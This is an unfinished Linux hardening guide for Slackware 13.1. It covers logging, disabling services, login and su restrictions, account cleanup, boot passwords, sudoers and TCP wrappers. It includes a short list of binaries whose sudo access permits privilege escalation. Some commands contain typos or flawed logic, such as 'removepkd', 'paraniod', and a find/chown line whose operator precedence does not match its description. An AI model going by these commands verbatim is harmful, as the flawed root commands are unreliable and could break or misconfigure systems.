Slackware System Hardening
Copyright (c) 2002, 2005, 2006 2011 Jeffrey Denton
http://dentonj.freeshell.org/system-hardening-13.1.txt
Written by Jeffrey Denton <
[email protected]>
19 March 2011
Version - 0.9.0
** NOTE **
Added 20 January 2021
This was never finished. Posting for my own reference.
This is written for:
$ cat /etc/slackware-version
Slackware 13.1.0
This is a list of some of the steps I take to improve the security on my
Slackware systems. It is by no means a complete list of everything that is
possible. You can either do all of the things listed here, or you can choose
the ones you feel would help secure your system.
WARNING: Hardening a system is a compromise between security
and usability. Some of the things I do would adversely
affect the usability of your system and may very well
break things. Please have one of the following on hand
just in case you lock yourself out of your system:
Tom's Rootboot -
http://www.toms.net/rb/
The "Live" CD that comes with the official
version of Slackware
The Slackware Install CDs
You should make a backup of anything that you feel is
important, would be hard to replace, or that you simply
could not do without BEFORE implementing anything listed
here.
If you don't understand what a setting or configuration
is doing, don't use it on your system.
The contents of this document is only meant to be used
on Slackware Linux.
Some of the settings are redundant (defense in depth) or
may conflict.
You have been warned.
Notes:
- The settings assume that only one user is on the system, "dentonj",
adjust as necessary.
- Associated man pages are listed for further information
- I will comment this document if I ever get around to it
- This is still a draft as there are many TODO items.
- Before making changes to a file, it's a good idea to make a copy
of the original file: cp syslog.conf syslog.conf.orig
----[ Keep Current ]----
http://www.slackware.com/security/
http://www.slackware.com/lists/
To subscribe to the Slackware Security mailing list, email:
[email protected]
with the phrase "subscribe slackware-security" in the body of the email.
----[ Logging ]----
/etc/rc.d/rc.syslog:
echo -n "/usr/sbin/syslogd -m 10 -r -h"
/usr/sbin/syslogd -m 10 -r -h
root@darkstar:~# /etc/rc.d/rc.syslog restart
Increase the timestamp interval from 20 minutes to 10 minutes. It is
commonly recommended to set the timestamp interval to 0 to prevent the logs
from filling up with "-- MARK --" entries. I've found that these entries
are sometimes the only indication that can be used to determine when a
system hung or crashed. The "-r" options enables the system to receive
syslog messages from the remote hosts. The "-h" option allows syslog to
forward messages it receives from remote hosts. The allows syslog messages
to be logged on several systems for redundancy. Syslog messages that are
sent over the network are not encrypted and can be easily captured. Watch
out for syslog forwarding loops when using both "-r" and "-h".
There are two security concerns with using syslog to receive logs over the
network. The first is the information is not encrypted. The information
is vulnerable to being intercepted. The second security concern is the
system excepting remote logs is vulnerable to a denial of service attack.
An attacker can fill up the filesystem by flooding the syslogd daemon. Use
IPTables to restrict who can send traffic to that port. Of course this
will not stop someone from spoofing traffic to appear to come from a
trusted source.
Opens UDP port 514.
man syslogd
man klogd
/etc/syslog.conf
# Log everything to a file
*.* -/var/log/messages
# Log everything to a tty (Ctrl-Alt-F12)
*.* /dev/tty12
# Log everything to a log host
*.* @192.168.1.2
# Display emergencies to everyone using wall
*.=emerg *
# Send alerts directly to the user's terminals
*.=alert root,dentonj
root@darkstar:~# /etc/rc.d/rc.syslog restart
The other option to logging everything to one file is have a long
syslog.conf file that splits up the logs umoung multiple files. In most
cases, the default configuration file will due. Which method you decide on
using really comes down to user preference. The "-" keeps syslogd from i
syncing the file everytime an entry is written. This is a performance
feature that may cause the loss of information if the system crashes. If
performance is not a concern or if the idea of losing logging information
is a concern, then remove the "-".
man syslogd
This manpage has a great description of how to deal with troublesome
individuals.
man syslog.conf
/etc/logrotate.conf:
weekly
rotate 26
create
compress
shred
include /etc/logrotate.d
/var/log/wtmp {
monthly
create 0664 root utmp
rotate 6
}
/var/log/btmp {
monthly
create 0600 root root
rotate 6
}
Logrotate is run at 4:40 everyday by cron. The file that starts logrotate
is /etc/cron.daily/logrotate. I like to keep logs for 6 months. Most
people will think this is excessive. Make sure you have enough hard drive
space to store 6 months worth of logs.
root@darkstar:~# less /var/lib/logrotate/status
This file will give you the status on what log files are configured to be
rotated and the last time they were rotated. Make sure that you have you
have not missed a log file.
root@darkstar:~# last
root@darkstar:~# last -f /var/log/wtmp.1.gz
root@darkstar:~# lastb
root@darkstar:~# lastb -f /var/log/btmp.1.gz
man logrotate
/etc/logrotate.d/syslog:
/var/log/cron /var/log/debug /var/log/maillog /var/log/messages
/var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog {
create 0640 root root
#mail
[email protected]
#mailfirst
sharedscripts
postrotate
/bin/kill -HUP `cat /var/run/syslogd.pid \
2> /dev/null || true`
endscript
}
Even though I log everything to one file, I setup logrotate to backup all
of the log files. The only logs that I'm not interested in retaining are
those for Xorg or dmesg. Daemons such as Apache and vsftpd will have
logrotate.d settings listed below.
man logrotate
/etc/rc.d/rc.S:
# Update the current kernel level in the /etc/motd (Message Of The Day) file,
# if the first line of that file begins with the word 'Linux'.
# You are free to modify the rest of the file as you see fit.
#if [ -x /bin/sed ]; then
# /bin/sed -i "{1s/^Linux.*/$(/bin/uname -sr)\./}" /etc/motd
#fi
The last 3 lines are uncommented by default. Since I like to set a custom
message and provide a little less information about the systme, I comment
out the above line. The default comment above is self explanatory.
man motd
/etc/motd, /etc/issue.net, /boot/boot_message.txt:
****************************************************************
Unauthorized access prohibited; all access and activities not
explicitly authorized by the administrator are unauthorized.
All activities are monitored and logged. There is no privacy
on this system. Unauthorized access and activities or any
criminal activity will be reported to appropriate authorities.
****************************************************************
Or:
"You seem to be lost. Please return to your little corner of the Internet."
I use the first message for anyone that is logging into a system. From
what I've been told, if you don't have some sort of default message that
indicates that there is no privacy on this computer, there is the chance
that logs from it used in a court may possibly be thrown out. I've also
been told the opposite is true. But since that lawyer did not represent
me or look out for my best interests, I'll stick with the message.
I use the second message when I don't care about pursuing legal actions
for unauthorized activities and want to let the offender know this isn't
your ordinary computer.
Since we make a change to the message given by the boot loader, we have
to rerun lilo.
root@darkstar:~# lilo -v -p
If lilo returns an error, try to determine what the problem is and rerun
lilo before you reboot the system. Otherwise, you may end up with a
system that doesn't boot properly.
man issue
man motd
man lilo
/etc/rc.d/rc.local:
# Log icmp packets to syslog
/usr/sbin/icmpinfo -v -n -p -s -l
This will log icmp packets to syslog, except pings. There is the
potential problem that someone could flood your logs and fill up your
hard drive while logging ICMP packets.
man icmpinfo
/sbin/accton:
Account processing is turned on by /etc/rc.d/rc.M. However, the log file
doesn't exist.
root@darkstar:~# touch /var/log/pacct
man ac
man 2 acct
man 5 acct
man accton
man sa
man lastcomm
info accounting
root@darkstar:~# ac -d
root@darkstar:~# ac -p
/etc/rc.d/rc.M:
Increase logging in cron.
/usr/sbin/crond -l7 >> /var/log/cron 2>&1
man crond
----[ Disable Daemons/Close Ports ]----
List the open sockets:
root@darkstar:~# netstat -peanutgw
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN 0 4117 1546/inetd
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 0 5556 1711/X
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 0 4120 1546/inetd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 4151 1555/sshd
tcp6 0 0 :::6000 :::* LISTEN 0 5555 1711/X
tcp6 0 0 :::22 :::* LISTEN 0 4153 1555/sshd
udp 0 0 0.0.0.0:512 0.0.0.0:* 0 4119 1546/inetd
udp 0 0 0.0.0.0:37 0.0.0.0:* 0 4118 1546/inetd
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 0 7764 2250/icmpinfo
IPv6/IPv4 Group Memberships
Interface RefCnt Group
--------------- ------ ---------------------
lo 1 224.0.0.1
lo 1 ff02::1
eth0 1 ff02::1
wlan0 1 ff02::1
/etc/inetd.conf:
The following are running by default:
time - TCP port 37
time - UDP port 37
auth - TCP port 113
comsat - UDP port 512
Comment out the lines of the services that you don't need.
root@darkstar:~# grep -v "^#" /etc/inetd.conf
man inetd
man in.comsat
man in.identd
man grep
/etc/rc.d/rc.inetd:
root@darkstar:~# /etc/rc.d/rc.inetd stop
root@darkstar:~# chmod a-x /etc/rc.d/rc.inetd
man inetd
man chmod
/usr/X11R6/bin/startx:
defautserverargs="-nolisten tcp"
Closes TCP port 6000+n, where n is $DISPLAY (the default is 0).
man Xserver
/etc/X11/xdm/Xservers:
:0 local /usr/bin/X -nolisten tcp :0
Closes TCP port 6000.
man Xserver
man xdm
/etc/X11/xdm/Xaccess:
Make sure everything is commented.
man xdm
/etc/rc.d/rc.4:
exec /usr/bin/xdm -nodaemon -udpPort 0
exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0
Closes UDP port 177.
man xdm
/etc/X11/fs/config:
use-syslog = yes
no-listen = tcp
Closes TCP port 7100.
man xfs
/etc/rc.d/rc.inet2:
Most of the rc.scripts are started here. From the script:
"Uncomment or comment out sections depending on which
services you site requires."
There are three ways to stop daemons and services from being started. The
first way is to make the script starting the daemon or service non-
executable:
chmod 600 /etc/rc.d/rc.bind
The second way is to comment out the sections of this script that starts
the daemon or service:
Lines 95-97:
# Start the BIND name server daemon:
# if [ -x /etc/rc.d/rc.bind ]; then
# /etc/rc.d/rc.bind start
# fi
If you are not going to use the services, you can remove the package.
Removing the package will not remove the rc.script. The scripts are
installed with the name rc.script.new and then renamed to rc.script.
root@darkstar:~# removepkg bind
Comment out the following lines:
Lines 20 - 37: Disable mounting of NFS filesystems
Lines 43 - 45: Disable RPC portmapper
Lines 63 - 68: Disable mount of SMB filesystems
Lines 79 - 81: Disable IPv4 packet forwarding
Lines 84 - 86: Disable inetd
Lines 95 - 97: Disable BIND
Lines 100 - 102: Disable NIS
Lines 109 - 111: Disable NFS server
/etc/rc.d/rc.M:
Comment out the following lines:
Lines 187 - 189: Disable dnsmasq
Lines 141 - 143: Disable snmpd
Lines 197 - 203: Disable CUPS and lpd
Lines 206 - 208: Disable netatalk
Lines 259 - 261: Disable atd
Lines 296 - 298: Disable saslauthd
Lines 301 - 303: Disable sendmail
Lines 321 - 323: Disable MySQL
Lines 326 - 328: Disable Apache
Lines 331 - 333: Disable OpenLDAP
Lines 337 - 339: Disable Samba
Lines 347 - 349: Disable SystemV init scripts
/etc/rc.d/rc.acpid:
Advanced Configuration and Power Interface event daemon
root@darkstar:~# /etc/rc.d/rc.acpid stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.acpid
Or:
root@darkstar:~# removepkg acpid
root@darkstar:~# rm -i /etc/rc.d/rc.acpid
This daemon doesn't open any ports.
/etc/rc.d/rc.alsa:
Advanced Linux Sound Architecture
root@darkstar:~# /etc/rc.d/rc.alsa stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.alsa
Or:
root@darkstar:~# removepkg alsa-utils
root@darkstar:~# removepkg alsa-lib
root@darkstar:~# removepkg alsa-oss
root@darkstar:~# rm -i /etc/rc.d/rc.alsa
This daemon doesn't open any ports.
/etc/rc.d/rc.atalk:
AppleTalk
root@darkstar:~# /etc/rc.d/rc.atalk stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.atalk
Or:
root@darkstar:~# removepkg netatalk
root@darkstar:~# rm -i /etc/rc.d/rc.atalk
Closes TCP port 548.
/etc/rc.d/rc.autofs:
Automount for FILE, NIS, and LDAP
root@darkstar:~# /etc/rc.d/rc.autofs stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.autofs
Or:
root@darkstar:~# removepkg autofs
root@darkstar:~# rm -i /etc/rc.d/rc.autofs
This daemon doesn't open any ports.
/etc/rc.d/rc.bind:
BIND
root@darkstar:~# /etc/rc.d/rc.bind stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.bind
Or:
root@darkstar:~# removepkg bind
root@darkstar:~# rm -i /etc/rc.d/rc.bind
Closes TCP ports 53 and 953.
Closes UDP ports 53 and 32768.
/etc/rc.d/rc.bluetooth:
Bluetooth stack for Linux
root@darkstar:~# /etc/rc.d/rc.bluetooth stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.bluetooth
Or:
root@darkstar:~# removepkg bluez
root@darkstar:~# removepkg bluez-fireware
root@darkstar:~# removepkg bluez-hcidump
root@darkstar:~# rm -i /etc/rc.d/rc.bluetooth
/etc/rc.d/rc.cups:
Common UNIX Printing System
root@darkstar:~# /etc/rc.d/rc.cups stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.cups
Or:
root@darkstar:~# removepkg cups
root@darkstar:~# rm -i /etc/rc.d/rc.cups
Closes TCP and UDP port 631.
/etc/rc.d/rc.dnsmasq:
A lightweight DHCP and caching DNS server
root@darkstar:~# /etc/rc.d/rc.dnsmasq stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.dnsmasq
Or:
root@darkstar:~# removepkg dnsmasq
root@darkstar:~# rm -i /etc/rc.d/rc.dnsmasq
Closes TCP and UDP port 53, 67, and 68.
/etc/rc.d/rc.fuse:
Filesystem in Userspace
root@darkstar:~# /etc/rc.d/rc.fuse stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.fuse
Or:
root@darkstar:~# removepkg fuse
root@darkstar:~# rm -i /etc/rc.d/rc.fuse
This daemon doesn't open any ports.
/etc/rc.d/rc.gpm:
General Purpose Mouse, you will more than likely want to keep this.
root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm
This daemon doesn't open any ports.
/etc/rc.d/rc.hald:
The HAL Hardware Abstraction Layer, you will more than likely want to
keep this.
root@darkstar:~# chmod go-rxw /etc/rc.d/rc.hald
This daemon doesn't open any ports.
/etc/rc.d/rc.httpd:
Apache webserver
root@darkstar:~# /etc/rc.d/rc.httpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.httpd
Or:
root@darkstar:~# removepkg httpd
root@darkstar:~# rm -i /etc/rc.d/rc.httpd
Closes TCP port 80.
/etc/rc.d/rc.inetd:
The Internet daemon
root@darkstar:~# /etc/rc.d/rc.inetd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.inetd
Or:
root@darkstar:~# removepkg inetd
root@darkstar:~# rm -i /etc/rc.d/rc.inetd
Closes TCP ports 37 and 113 (by default).
Closes UDP ports 37 and 512 (by default).
/etc/rc.d/rc.ip_forward:
IPv4 Packet Forwarding
root@darkstar:~# /etc/rc.d/rc.ip_forward stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.ip_forward
The script is part of a package of network scripts that should not be
removed.
/etc/rc.d/rc.messagebus:
D-Bus message bus system
root@darkstar:~# /etc/rc.d/rc.messagebus stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.messagebus
Or:
root@darkstar:~# cd /var/log/packages && removepkg dbus*
root@darkstar:~# rm -i /etc/rc.d/rc.messagebus
/etc/rc.d/rc.mysqld:
The MySQL server daemon
By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for
details on how to start the daemon.
The script prevents incoming network connections by default with the
"--skip-networking" option. If this option is commented out, TCP port
3306 will be opened.
root@darkstar:~# /etc/rc.d/rc.mysqld stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.mysqld
Or:
root@darkstar:~# removepkg mysql
root@darkstar:~# rm -i /etc/rc.d/rc.mysqld
This daemon doesn't open any ports by default.
/etc/rc.d/rc.nfsd:
The kfnsd NFS daemon
By default, the deamon will not start because the file /etc/exports is not
configured properly.
root@darkstar:~# /etc/rc.d/rc.nfsd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.nfsd
Or:
root@darkstar:~# removepkg nfs-utils
root@darkstar:~# rm -i /etc/rc.d/rc.nfsd
/etc/rc.d/rc.ntpd:
Network Time Protocol
root@darkstar:~# /etc/rc.d/rc.ntpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.ntpd
Or:
root@darkstar:~# removepkg ntp
root@darkstar:~# rm -i /etc/rc.d/rc.ntpd
Closes TCP and UDP port 123.
/etc/rc.d/rc.rpc:
RPC portmapper
root@darkstar:~# /etc/rc.d/rc.rpc stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.rpc
Or:
root@darkstar:~# removepkg portmap
root@darkstar:~# rm -i /etc/rc.d/rc.rpc
/etc/rc.d/rc.samba:
The Samba SMB file/print server
By default, the daemon will not start because the file /etc/samba/smb.conf
is not present.
root@darkstar:~# /etc/rc.d/rc.samba stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.samba
Or:
root@darkstar:~# removepkg samba
root@darkstar:~# rm -i /etc/rc.d/rc.samba
/etc/rc.d/rc.saslauthd:
Simple Authentication and Security Layer
root@darkstar:~# /etc/rc.d/rc.saslauthd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.saslauthd
Or:
root@darkstar:~# removepkg cyrus-sasl
root@darkstar:~# rm -i /etc/rc.d/rc.saslauthd
/etc/rc.d/rc.sendmail:
Sendmail
root@darkstar:~# /etc/rc.d/rc.sendmail stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail
Or:
root@darkstar:~# removepkg sendmail
root@darkstar:~# removepkg sendmail-cf
root@darkstar:~# rm -i /etc/rc.d/rc.sendmail
Closes TCP ports 25 and 587.
/etc/rc.d/rc.snmpd:
Simple Network Management Protocol
root@darkstar:~# /etc/rc.d/rc.snmpd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.snmpd
Or:
root@darkstar:~# removepkg net-snmp
root@darkstar:~# rm -i /etc/rc.d/rc.snmpd
/etc/rc.d/rc.sshd:
The Secure Shell Server
root@darkstar:~# /etc/rc.d/rc.sshd stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sshd
Or:
root@darkstar:~# removepkd openssh
root@darkstar:~# rm -i /etc/rc.d/rc.sshd
Closes TCP port 22.
/etc/rc.d/rc.syslog:
The system logging daemon, you will more than likely want to keep this.
If the "-r" option is used, UDP port 514 is opened.
This daemon doesn't open any ports by default.
root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog
/etc/rc.d/rc.sysstat:
System performance monitoring tools
root@darkstar:~# /etc/rc.d/rc.sysstat stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sysstat
Or:
root@darkstar:~# removepkd sysstat
root@darkstar:~# rm -i /etc/rc.d/rc/sysstat
/etc/rc.d/rc.sysvinit:
"This file provides basic compatibility with SystemV style startup
scripts."
Unless you have installed a daemon that requires the use of SystemV
style startup scripts, there is no need for it to be executable.
root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit
/etc/rc.d/rc.udev:
"udev provides a dynamic device directory containing only the files for
actually present devices. It creates and removes device node files
usually located in the /dev directory." You will more than likely want
to keep this.
This daemon doesn't open any ports.
root@darkstar:~# chmod 600 /etc/rc.d/rc.udev
man udev
/etc/rc.d/rc.wireless.conf:
This file holds the configuration settings used by /etc/rc.d/rc.wireless.
The file may hold encryption keys in plain text. Make sure that users
are not able read this file (the default setting).
root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf
/etc/rc.d/rc.yp:
The Network Information Service
The contents of this file is commented out by default.
root@darkstar:~# chmod 600 /etc/rc.d/rc.yp
Or:
root@darkstar:~# removepkg yptools
root@darkstar:~# rm -i /etc/rc.d/rc.yp
----[ Limit Access ]----
/etc/rc.d/rc.M:
chmod 1733 /tmp /var/tmp
Prevents users for looking at the contents of those directories. It still
allows them to create, access, and modify files in those directories if
they know the actual file name. This does not stop users from running
executables in /tmp.
dentonj@darkstar:~$ ls -ld /tmp
drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/
dentonj@darkstar:~$ cp /bin/date /tmp/test
dentonj@darkstar:~$ /tmp/test
Thu Jun 27 12:55:00 MST 2001
dentonj@darkstar:~$ ls /tmp
ls: /tmp: Permission denied
man chmod
/etc/rc.d/rc.S:
chmod 1733 /tmp/.ICE-unix
chmod 1733 /tmp/.X11-unix
Don't let everyone have read access to utmp:
chmod 660 /var/run/utmp
man utmp
man chmod
/etc/lilo.conf:
# mandatory - enter a password with every boot
# restricted - enter a password only when a boot time parameter
# is used (e.g. - "linux single")
# Pick one
mandatory
#restricted
# Use the "-p" option with the lilo command to store the hashed password
# in a separate file
password=""
prompt
timeout=0
#menu-title="Unauthorized Access Prohibited"
message=/boot/boot_message.txt
serial=0,9600n8
root@darkstar:~# lilo -v -p
root@darkstar:~# chmod go-rwx /etc/lilo.conf
Using the setting 'password=""' and then the '-p' option with lilo will
prompt you to enter a pass phrase while lilo is running. The pass phrase
is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims
that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way,
it's better than having the password listed in /etc/lilo.conf in plain
text. The configuration options above will require the password to be
entered whenever the system boots. You may not want to use the "mandatory"
setting if uptime is important or when you normally only access the system
remotely. In these cases, use "restricted" instead.
man lilo
man lilo.conf
/etc/login.access:
+:root dentonj:LOCAL
-:ALL:ALL
Only root and dentonj can login locally. This does not affect logging in
via ssh.
Error generated: "Login incorrect"
man login.access
/etc/login.defs:
FAIL_DELAY 15
LOG_UNKFAIL_ENAB yes
LOG_OK_LOGINS yes
SULOG_FILE /var/log/sulog
ISSUE_FILE /etc/issue
#HUSHLOGIN_FILE
UMASK 077
PASS_MAX_DAYS 90
PASS_MIN_LEN 18
ENCRYPT_METHOD SHA512
SHA_CRYPT_MIN_ROUNDS 500000
SHA_CRYPT_MAX_ROUNDS 500000
DEFAULT_HOME no
#ENVIRON_FILE
root@darkstar:~# touch /var/log/sulog
root@darkstar:~# passwd
root@darkstar:~# chage -M 90 -W 7 root
root@darkstar:~# chage -M 90 -W 7 dentonj
dentonj@darkstar:~$ passwd
Setting the number of SHA rounds to 500000 means that it takes a little
longer to login. If you are using a slow computer, you may have to
adjust the number of rounds used.
man login.defs
man passwd
/etc/suauth:
ALL:ALL EXCEPT dentonj:DENY
Or:
ALL:ALL EXCEPT GROUP wheel:DENY
root@darkstar:~# usermod -g users -G wheel dentonj
root@darkstar:~# chmod go-rwx /etc/suauth
Only dentonj is allowed to switch users. Or, only members of the wheel
group can switch users.
Error generated: "Access to su to that account DENIED."
"You are not authorized to su root"
man suauth
/etc/porttime:
*:root,dentonj:Al0000-2400
*:*:
root@darkstar:~# chmod go-rwx /etc/porttime
The third field specifies when someone can login. If the field is empty,
then the user is not able to login. The "*:*:" entry is a default deny
rule to catch everyone not already listed. The third field lists the times
that a user is allowed to login. If that field is empty, the user is not
allowed to login.
The daemon logoutd is normally run to enforce the login time restrictions
listed in /etc/porttime.
Error generated: "Invalid login time"
man porttime
/etc/rc.d/rc.local:
# Enforce login time restrictions set in /etc/porttime
if [ -x /usr/sbin/logoutd ]; then
/usr/sbin/logoutd
fi
man logoutd
/etc/limits:
dentonj C0L1
* L0
root@darkstar:~# chmod go-rwx /etc/limits
The setting "* L0" is a default rule for anyone not previously listed. The
number of logins permitted is set to zero, which means anyone not
previously listed is not allowed to login. This does not affect root.
Don't let users create core dumps.
Error generated: "Too many logins."
man limits
/etc/shells:
Allowing users to run different shells allows them to bypass any security
restrictions set on their login shell.
Delete the following:
/bin/ash
/bin/csh
/bin/ksh
/bin/tcsh
/bin/zsh
root@darkstar:~# removepkg ash
root@darkstar:~# removepkg ksh93
root@darkstar:~# removepkg tcsh
root@darkstar:~# removepkg zsh
man shells
/usr/sbin/faillog:
root@darkstar:~# faillog -u dentonj -m 10
root@darkstar:~# faillog -a
Don't set faillog for root. This is one of the few settings that can
actually stop root from logging in. Using faillog can cause a denial of
service if the maximum number of logins is reached. Use faillog with
caution.
Error generated: "Login incorrect"
man faillog
/etc/passwd:
According to the Linux Standard Base Specification 4.1, the only required
user accounts are root, bin, and daemon. All other accounts are optional.
Delete any unused accounts. The following lists the number of files and
directores that are owned by each account.
root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
> echo -n "$i - "
> find / -user $i -ignore_readdir_race | wc -l
> done
root - 374210
bin - 3
daemon - 10
adm - 0
lp - 1
sync - 0
shutdown - 0
halt - 0
mail - 0
news - 46
uucp - 17
operator - 0
games - 4
ftp - 0
smmsp - 1
mysql - 2
rpc - 0
sshd - 0
gdm - 0
oprofile - 0
apache - 0
messagebus - 7
haldaemon - 14
pop - 0
nobody - 3
dentonj - 2595
Your numbers may vary. To list the files owned by a particular user:
root@darkstar:~# find / -user nobody -ls
Logins and ownership of files and directories is not the only use for
accounts. They can also be used to run daemons as a non-root user.
The current processes and the accounting information can be used to
determine which accounts are used.
root@darkstar:~# ps -eo euser,ruser,suser,fuser,f,comm,label
root@darkstar:~# sa -m
root@darkstar:~# lastcomm
By default, the unused accounts have there shell set to /bin/false.
This prevents the accounts from being used interactively. Some argue
that deleting the accounts is excessive and unnecessary. I delete them.
Error generated when logging into an account with the shell set as
/bin/false (from Slackware 11.0):
darkstar login: test
Password: *************************
Linux 2.4.32
Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2
No mail.
Welcome to Linux 2.4.32 (tty2)
darkstar login:
The unused accounts may vary and depend on the daemons that run on your
system. I typically delete the following:
root@darkstar:~# userdel adm
adm
games
gdm
halt
lp
news
operator
oprofile
pop
rpc
shutdown
sync
uucp
The accounts sync, halt, and shutdown don't work by default. They allow
someone to su or login to sync, halt, or shutdown the system. A password
would have to be set before they work, as well as add them to any of the
other files that can be used to restrict logins or the use of su. Unless
you really want to give someone the ability to do any of the three, it's
safe to delete the accounts.
root@darkstar:~# su halt
halt: must be superuser.
root@darkstar:~# su shutdown
shutdown: you must be root to do that!
root@darkstar:~# userdel halt
root@darkstar:~# userdel shutdown
root@darkstar:~# userdel sync
Password aging:
Note: Don't use this if you like to make the /etc/passwd and the
/etc/shadow files immutable (chattr +i ...). It gets ugly... If you
let the password expire, you will not be able to login until you reset
the password. But if the /etc/shadow file is immutable and cannot be
changed, then you will not be able to login. To fix the problem, you
would have to boot tomsrtbt or a Linux boot CD, mount the hard drive
partition where /etc is located, and remove the immutable attribute
from /mnt/etc/shadow (chattr -i ...).
Set the maximum number of days a password remains valid. For users,
disable the account after the password has expired and the account remains
inactive for 30 days.
root@darkstar:~# passwd -x 90 -w 7 root
root@darkstar:~# passwd -x 90 -w 7 -i 30 dentonj
Check the status of each account and the integrity of the passwd file:
root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
> passwd -S $i
> done
root@darkstar:~# pwck
man 1 passwd
man 5 passwd
man find
man userdel
man false
man pwck
man ps
man sa
man lastcomm
/etc/group:
According to the Linux Standard Base Specification 4.1, the only required
groups are root, bin, and daemon. All other groups are optional. Delete
any unused groups. The following lists the number of files and directores
that belong to each group:
root@darkstar:~# for i in `cat /etc/group | awk -F: '{print $1}'`; do
> echo -n "$i - "
> find / -group $i -ignore_readdir_race | wc -l
> done
root - 373328
bin - 83
daemon - 11
sys - 1
adm - 0
tty - 147
disk - 31
lp - 12
mem - 0
kmem - 3
wheel - 0
floppy - 26
mail - 6
news - 47
uucp - 16
man - 0
dialout - 4
audio - 12
video - 3
cdrom - 2
games - 0
slocate - 3
utmp - 4
smmsp - 3
tape - 0
mysql - 2
rpc - 0
sshd - 0
gdm - 0
shadow - 4
ftp - 0
oprofile - 0
apache - 1
messagebus - 7
haldaemon - 14
plugdev - 2
power - 0
netdev - 0
pop - 0
scanner - 1
nobody - 2
nogroup - 2
users - 2700
console - 0
Your numbers may vary. To list the files owned by a particular group:
root@darkstar:~# find / -group nobady -ls
root@darkstar:~# groupdel adm
Repeat for the following:
adm
games
lp
news
pop
uucp
root@darkstar:~# grpck
Removing accounts may create a long list of files that no longer belong to
any user or group. If you are interested what the files are:
root@darkstar:~# find / -nouser -o -nogroup -ls > unowned.out
To change the ownership of the files:
root@darkstar:~# find / -nouser -o -nogroup -exec chown root.root {} \;
man group
man find
man groupdel
man grpck
man chown
/etc/sudoers:
Defaults runaspw
Defaults ! root_sudo
Defaults ignore_dot
Defaults tty_tickets
Defaults requiretty
Defaults listpw=always
Defaults verifypw=always
Defaults !path_info
Defaults noexec
Defaults passwd_timeout=1
Defaults env_reset
Defaults insults
%wheel ALL=(ALL) ALL
root@darkstar:~# groups dentonj
dentonj : users
root@darkstar:~# usermod -g users -G wheel dentonj
root@darkstar:~# groups dentonj
dentonj : users wheel
root@darkstar:~# mkdir /var/run/sudo
There are a number a security concerns when allowing users to use sudo.
Make sure you completely read the man pages for sudo and sudoers.
There are generally two approaches when configuring sudo. The first is to
allow the user to run any command. This is essentially giving them su
access to root.
The second approach is to configuring sudo is to only allow a limited
number of commands to be run. If you are going to use the second approach,
there are a few commands that you don't want to allow the user to run.
These commands can be abused to give the user full access to the system.
Make sure you don't add the following or those listed in the Shell Escapes
section below to the /etc/sudoers file:
/bin/cat
/bin/chmod
/bin/chown
/bin/cpio
/bin/mount
/bin/rpm
/bin/tar
/sbin/installpkg
/usr/bin/env
/usr/sbin/useradd
/usr/sbin/usermod
This list should be much longer.
root@darkstar~# sudo -V
root@darkstar~# sudo -L
man sudo
man sudoers
man visudo
man groups
man usermod
/etc/ftpusers:
This file is used to deny anyone listed from being able to log into the
local ftp server. Add the following:
bin
daemon
haldaemon
mail
smmsp
messagebus
mysql
sshd
nobody
Add all system accounts that are present in /etc/passwd.
man ftpusers
/etc/host.conf:
nospoof on
spoofalert on
spoof warn
man host.conf
/etc/hosts.allow:
TCP Wrappers
all:local:banners /etc/banners:allow
sshd:192.168.1.:banners /etc/banners:allow
sendmail:all:banners /etc/banners:allow
all:paraniod:spawn /usr/bin/logger "%d deny paraniod %c %p %a %h %u" \
:banners /etc/banners:deny
all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \
:banners /etc/banners:deny
From `man hosts_options`:
banners /some/directory
Look for a file in `/some/directory` with the same
name as the daemon process (for example in.telnetd
for the telnet service), and copy its contents to
the client.
If you are using any of the services listed below, make sure you add an
allow rule for it. If you want a different banner for a particular
service, delete the symlink and create a text file with the same name.
root@darkstar:~# mkdir /etc/banners && cd /etc/banners
root@darkstar:/etc/banners# ln -s ../issue.net afpd
root@darkstar:/etc/banners# ln -s ../issue.net imapd
root@darkstar:/etc/banners# ln -s ../issue.net in.identd
root@darkstar:/etc/banners# ln -s ../issue.net in.rexecd
root@darkstar:/etc/banners# ln -s ../issue.net in.rlogind
